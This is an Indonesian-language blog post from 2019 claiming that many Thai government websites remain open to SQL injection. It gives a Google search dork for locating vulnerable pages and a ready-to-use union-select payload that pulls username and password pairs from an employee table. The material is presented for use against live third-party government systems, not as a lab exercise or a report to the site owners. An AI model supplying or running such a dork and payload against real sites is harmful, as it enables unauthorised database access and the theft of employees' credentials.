Celah SQLI Pada Website Pemerintahan Thailand | Info Links 386

/* No Script */ body,html{overflow:hidden} .noscript{background:#1277cb;color:#fff;padding:8% 0 0 0;position:fixed;bottom:0;left:0;top:0;right:0;z-index:1000;height:auto;-webkit-transform:translateZ(0);transform:translateZ(0);overflow:hidden} .noscript p{margin:0;text-align:center;padding:0 20px 10px 20px;margin:auto;font-size:3rem;line-height:1.5;font-family:monospace;max-width:970px;text-transform:uppercase;font-weight:700} .noscript p span{color:#ffe88b;font-size:10rem;line-height:normal;font-weight:normal}

Home » Unlabelled » Celah SQLI Pada Website Pemerintahan Thailand

Selasa, 09 April 2019

Celah SQLI Pada Website Pemerintahan Thailand

Published by : Mariadi Habibi

Situs – situs pemerintahan thailand, banyak sekali yang mempunyai kerentanan dan ringan diinjeksi. Hanya cukup bersama lakukan sql injection, kalian dapat menyusupi database berasal dari situs target.

Vuln ini sebetulnya telah lama ditemukan dan saya pun dulu memicu write upnya di laman facebook, namun entah kenapa tidak tersedia perbaikan berasal dari pihak admin situs pemerintah thailand. Dan bukan cuma satu dua, namun hampir seluruh situs tetap dapat disusupi manfaatkan sql injection.

Tanpa wajib tools seperti havij dan sqlmap, ataupun injeksi secara manual. Disini saya dapat berikan dork beserta exploit yang dapat segera mengkuak database websitenya.

Dork: inurl:plantype_id= main.php
Exploit: -69+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee–+-

Baca selengkapnya di Thailand Government SQL Injection Vulnerability.

Load comments

Langganan: Posting Komentar ( Atom )

Info Links 386

Selasa, 09 April 2019

Celah SQLI Pada Website Pemerintahan Thailand

Get notify via email